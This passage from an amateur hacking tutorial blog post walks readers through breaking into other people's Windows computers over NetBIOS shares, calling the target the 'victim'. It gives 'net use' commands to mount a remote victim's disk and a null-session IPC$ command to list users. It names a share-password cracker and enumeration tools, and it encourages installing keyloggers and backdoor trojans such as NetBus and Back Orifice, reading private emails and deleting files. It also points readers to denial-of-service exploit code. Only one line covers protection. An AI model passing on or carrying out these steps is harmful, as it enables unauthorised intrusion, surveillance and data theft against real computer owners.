Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -
Windows 95
Windows 98
Windows Me
GO TO CONTENTS
________________________________________________________________________________
______________________________
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
GO TO CONTENTS
________________________________________________________________________________
______________________________
Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Lets Hack - Part 2 Denial of service attack
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1
Vulnerability 2
Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
________________________________________________________________________________
______________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let the windows update itself.
________________________________________________________________________________
______________________________
The above tutorial has been written by PIYUSH PRAKASH PUJARI
If you need more help please feel free to email me PIYUSHPUJARI123@GMAIL.com
Subscribe to:
Posts (Atom)